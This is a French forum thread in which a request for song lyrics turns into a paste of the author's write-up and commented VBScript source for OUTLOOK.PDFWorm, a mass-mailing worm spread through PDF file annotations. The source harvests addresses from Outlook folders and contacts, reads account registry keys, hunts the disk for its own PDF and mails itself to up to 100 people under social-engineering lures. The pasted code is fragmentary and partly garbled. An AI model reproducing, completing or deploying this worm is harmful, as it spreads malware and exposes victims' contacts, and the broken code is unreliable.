J'arrives pas à me connecter. - help please!

bonjour tout le monde!

voila j’aimerai bien me connecter à un site oû il y a des paroles de chansons au format .txt et .pdf (acrobat pour les compils de paroles). Mais quand j’essayes de me connecter le debit ralentie et même en attendant longuement rien n’arrive. Pourriez vous essayer de vous conecter et si vous y arrivés me récupérer les paroles et les up quelque part, s’il vous plait.

les paroles pour une chanson
la compil de paroles

merci beaucoups! :super:

@ +

Attention car quant jéssaie d’ouvrir mon antivirus me tire les oreilles :non:

c’est ce qu’on appelle le rapport d’incrémentation supérieur.
en effet ton av est calé sur un mode de filtrage trop puissant et les requètes de bios envoyées par de simples textes sont bloquées sous le prétexte d’un virus.

mais que te dit ton av?

s’il vous plait! :slight_smile:

Mon antivirus me previens dun animal quadripede en bois.
bon sans mon av il en est de meme que pour toi, c’est a dire que mon pc rame et que l’appliquation ne s’ouvre pas ,fais gaffe :oui: :oui:

Virus Name: OUTLOOK.PDFWorm
Author: Zulu
Origin: Argentina

VBScript worm. It uses OUTLOOK to send itself in a PDF (portable document format) file (first
using this file type).
When opened using Acrobat it will show an image with a minor game. Showing the solution to this
game involves doing a double click to a file annotation, which after a warning will run a VBS,
VBE or WSF file (depending of the worm version).
The VBScript file will create and show a JPG file with the solution to the game and it will try
to find the PDF file to spread it. This is necessary because when the link is used, Acrobat
will create the VBS, VBE or WSF file in Windows’ temporary directory and it will run this file,
so this VBScript file doesn’t know the path of the PDF file to spread.
Then it will start the spreading code using a way of using OUTLOOK not seen before in any
worm (spreading details can be found in the features section of this file).
The password for changing the security options of the PDF file is “OUTLOOK.PDFWorm”.
This worm is designed to be a proof of concept, it has bad spreading capabilities, only the
necessary to be called a worm. Also, because file annotations are only available in the full
version of Acrobat, this worm will not run in Acrobat Reader.


  • Uses the PDF extension, not seen before in any virus/worm.
  • OUTLOOK spreading using new code, not the classic Melissa’s code and it’s variations like the
    one from Freelink.
    This new method will get addresses from the recipients of all emails in any OUTLOOK folder
    and from all address book entries (but taking the first three addresses of each contact, not
    just the first like most OUTLOOK worms).
    This new method is based in the possibility of reaching contacts from OUTLOOK folders instead
    of using the objects designed to read address books. So the code will look inside all OUTLOOK
    folders, and if the items inside them are emails or contacts, it will get those addresses.
    Subject, body and attachment name will be selected from some random choices. Also, it will
    limit the amount of emails to 100.
    It will be run only once in each computer since it uses the registry to check if it was
    already run.
  • Good social engineering. I even think that this PDF file would be manually sent by many of
    those users that are never tired of sending stupid jokes. :slight_smile:
  • To find the PDF file, if Word is installed it will use it to do the search, if Word is not
    installed, it will search for the file using VBScript code looking in many common paths and
    all subdirectories of those paths. Both methods will look for PDF files with their size
    similar to the original worm copy.
  • Uses script encoding (in version 1.1 and 1.2).
  • The VBScript file shows a JPG file when run, so it will show what the user expects.

Background information:

I was starting another project, much bigger and with good spreading capabilities. But that was
very delayed because of time problems, so I decided to try with PDF files first and then
continue with the other worm when I have time.
I saw four possibilities:

  • Using JavaScript with "mailMsg" method.
    It would only work in the full version of Acrobat.
    By using the "mailMsg" method (which uses MAPI) I could send an email message when the
    document is opened (page open action).
    But the problem was that I was not able of getting email addresses to send the message to.
  • Using the Acrobat menu.
    It would only work in the full version of Acrobat.
    I could use the "Send Mail…" menu option, calling it when the document is opened (page open
    action). That would open a window from the default email client with the attachment already
    Here the problem was how to send the necessary keys to send the message that was already
    opened in that window.
  • Using open file action.
    It would work in Acrobat and in Acrobat Reader. It displays a warning.
    By creating an open file action when the document is opened I could run any file with any
    code inside it.
    But the problem was that I had no file to run. This method could work for a trojan that runs
    "FORMAT.COM", but not for a worm.
  • Using a file annotation.
    It would only work in the full version of Acrobat. It displays a warning.
    Creating a file annotation with my file embedded inside the PDF file I could run my code.
    Acrobat would create the embedded file in the temporary directory and it would run the file
    from there.
    This has two problems. One was knowing the path of the PDF file, this was solved by searching
    the file in the hard disk since looking in the task name would only give the file name, not
    the full path. The other problem is that it’s not possible to open a file annotation
    automatically when the PDF file is opened since there is no action to do that and it seems
    that there is no way of getting the file using JavaScript code, so it was necessary that the
    user manually double clicked the file annotation. This last problem was not solved.

Of the four, the only possible way was the last one, since it’s problem could have something
like a workaround by using social engineering to make the user double click the file
So I did that. It won’t be an incredible worm, but it will make the fact that viruses/worms are
also available in PDF files. I know that was already known to be possible, but there was no
working virus/worm using them.

Changes between 1.1 and 1.2:

  • The VBE file used is now a WSF file with the code still encoded.
  • Minor changes to find the PDF file with the new size.

Changes between 1.0 and 1.1:

  • The VBS file used is now a VBE (encoded VBScript) file.
  • Minor changes to find the PDF file with the new size.

Here is the VBScript code from version 1.0 (this is a special version that has comments and
unnecessary spaces were not removed):

On Error Resume Next
Dim P 'Stores the path of the PDF file. It is declared because it needs to be global but it’s first used by a procedure.
Dim U() 'Array storing email addresses. This array is always one number bigger than the amount of email addresses.
ReDim U(0)

'Create and open image file showing what the user expects.

For Y=1 To Len(KJ) Step 2
Set S=CreateObject("Scripting.FileSystemObject")
Set FY=S.CreateTextFile(S.BuildPath(S.GetSpecialFolder(2),"PEACH.JPG"),True)
FY.Write PQ
Set W=CreateObject("WScript.Shell")
W.Run S.BuildPath(S.GetSpecialFolder(2),"PEACH.JPG")

'Create and check registry key to know if it was already run.

If IJ="Version 1.0. By Zulu." Then
W.RegWrite "HKLM\Software\OUTLOOK.PDFWorm\","Version 1.0. By Zulu."
End If

'Check if Outlook is installed.

Set C=CreateObject("Outlook.Application")
If C Is Nothing Then WScript.Quit

'Get email addresses from Outlook’s address book and Outlook’s emails (using OLE Automation).
'It will add them to the “U” array with the “Q” procedure using a method not seen before in any virus.

Set Z=C.GetNameSpace("MAPI")
Set N=Z.Folders(1)

'If it was not able of finding email addresses the file will stop running.

If UBound(U)=0 Then WScript.Quit

'Find duplicated addresses in the “U” array and assign an empty string in their place.

For Y=0 To UBound(U)-1
For X=Y+1 To UBound(U)-1
If U(Y)=U(X) And U(Y)<>"" Then U(X)=""

'Remove the infected user’s email addresses from the “U” array. It will check for the first 19 accounts.

For Y=1 To 9
J W.RegRead("HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts\0000000"&Y&"\SMTP Email Address")
J W.RegRead("HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts\0000000"&Y&"\SMTP Reply To Email Address")
J W.RegRead("HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts\0000001"&Y&"\SMTP Email Address")
J W.RegRead("HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts\0000001"&Y&"\SMTP Reply To Email Address")
J W.RegRead("HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts\00000010\SMTP Email Address")
J W.RegRead("HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts\00000010\SMTP Reply To Email Address")

'Check if there are email addresses in the “U” array after removing infected user’s email addresses.

For Y=0 To UBound(U)-1
If U(Y)<>"" Then Exit For
If Y=UBound(U)-1 Then WScript.Quit

'Check if Word is installed and search for PDF files with the correct size. When using Word the search will include all
'places in each fixed drive, the other type of search will only include usual places. The path of the PDF file will be
'stored in the “P” variable.
'I also tried looking for the task name using “Tasks.Item().Name” from Word, but it was only possible to find the file
'name, not the full path of the file, so a search is needed.

Set A=CreateObject(“Word.Application”)
If A Is Nothing Then
For Each B In S.Drives
If B.DriveType=2 Then
E B.DriveLetter&":\"
If P<>"" Then Exit For
End If
If P="" Then E S.GetSpecialFolder(2)
If P="" Then E W.SpecialFolders(“Desktop”)
If P="" Then E W.SpecialFolders(“MyDocuments”)
If P="" Then E W.RegRead(“HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir”)
Set G=A.FileSearch
'Do the search in each drive while the file is not found.
For Each B In S.Drives
If B.DriveType=2 Then
If G.FoundFiles.Count>0 Then
For Y=1 To G.FoundFiles.Count
Set L=S.GetFile(G.FoundFiles(Y))
If L.Size>168230 And L.Size<168250 Then
Exit For
End If
If P<>"" Then Exit For
End If
End If
End If

'If the path is not found (“P” is empty) the file will stop running.

If P="" Then WScript.Quit

'Create a string with values from the “U” array (to be used as the BCC part of the email message).
'It will limit the amount of email addresses to 100.

If UBound(U)-1<100 Then
For Y=0 To UBound(U)-1
If U(Y)<>"" Then
If T="" Then T=U(Y) Else T=T&";"&U(Y)
End If
Dim JD(99)
For Y=0 To 99
For Y=0 To 99
For X=Y+1 To 99
If JD(Y)=JD(X) And JD(Y)<>-1 Then JD(X)=-1
For Y=0 To 99
If JD(Y)=-1 Then JD(Y)=Int(UBound(U)*Rnd)
For Y=0 To 99
For X=Y+1 To 99
If JD(Y)=JD(X) And JD(Y)<>-1 Then JD(X)=-1
For Y=0 To 99
If JD(Y)<>-1 And U(JD(Y))<>"" Then
If T="" Then T=U(JD(Y)) Else T=T&";"&U(JD(Y))
End If
End If

'Set subject, body and attachment name.

If Int(2Rnd)=0 Then O="Fw: "
If EY=0 Then
O=O&“You have one minute to find the peach”
ElseIf EY=1 Then
O=O&“Find the peach”
ElseIf EY=2 Then
ElseIf EY=3 Then
End If
If Int(2Rnd)=0 Then O=O&"!"
If Int(4
Rnd)=0 Then O=UCase(O)
If Int(2Rnd)=0 Then F="> "
If EY=0 Then
If Left(O,2)=“Fw” Then F=F&Mid(O,5) Else F=F&O
ElseIf EY=1 Then
F=F&“Try finding the peach”
ElseIf EY=2 Then
F=F&“Try this”
ElseIf EY=3 Then
F=F&“Interesting search”
F=F&“I don’t usually send this things, but…”
End If
If EY<4 Then
If Int(2Rnd)=0 Then F=F&"!"
End If
If EY=0 Then
F=F&" :-)"
ElseIf EY=1 Then
F=F&" :)"
ElseIf EY=2 Then
F=F&" =)"
ElseIf EY=3 Then
F=F&" :-]"
End If
If Int(4Rnd)=0 Then F=UCase(F)
If EY=0 Then
ElseIf EY=1 Then
ElseIf EY=2 Then
SW=“find the peach.pdf”
ElseIf EY=3 Then
ElseIf EY=4 Then
End If
If EY=0 Then
ElseIf EY=1 Then
End If

'Copy PDF file to the temporary directory.

S.CopyFile P,SW

'Send email message.

Set H=C.CreateItem(0)
If Int(2*Rnd)=0 Then H.Body=F Else H.HTMLBody=F
H.Attachments.Add SW

'Delete PDF file from the temporary directory.

S.DeleteFile SW,True

'Recursive procedure used to get email addresses from Outlook and add them to the “U” array. It will get addresses from
'each contact in the address book (using a method not seen before in any worm and getting the first three addresses of
'each contact) and from the recipients of all emails found in any Outlook folder.

Sub Q(I)
On Error Resume Next
For Each B In I.Items
'If the item is a contact (it will give an error and continue if not), get it’s first three email addresses.
If B.Email1Address<>"" Then D B.Email1Address
If B.Email2Address<>"" Then D B.Email2Address
If B.Email3Address<>"" Then D B.Email3Address
'If the item is an email (it will give an error and continue if not), get the email addresses of all recipients.
For Each R In B.Recipients
D R.Address
'Use the procedure with all subfolders.
For Each B In I.Folders
End Sub

'Procedure that adds a value to the “U” array and changes the size of that array.

Sub D(M)
On Error Resume Next
ReDim Preserve U(UBound(U)+1)
End Sub

'Procedure that checks if the email address passed as parameter is available in the “U” array and, if so, it assigns an
'empty string in that array index.

Sub J(V)
On Error Resume Next
For X=0 To UBound(U)-1
If UCase(U(X))=UCase(V) Then
Exit For
End If
End Sub

'Recursive procedure used when searching for the PDF file without using Word. It will try finding the PDF file by looking
'for files with that extension and the correct size. If the file is not found in the specified directory it will look
'for all subdirectories and it will call itself using them as the new parameter.

Sub E(K)
On Error Resume Next
If S.FolderExists(K) Then
'Check all files in the specified directory.
For Each R In S.GetFolder(K).Files
If UCase(S.GetExtensionName(R.Name))=“PDF” Then
If R.Size>168230 And R.Size<168250 Then
Exit For
End If
End If
'If the file was not found and the directory is not root, use the procedure with all subdirectories.
If P="" And Right(K,2)<>":\" Then
For Each R In S.GetFolder(K).SubFolders
E R.Path
End If
End If
End Sub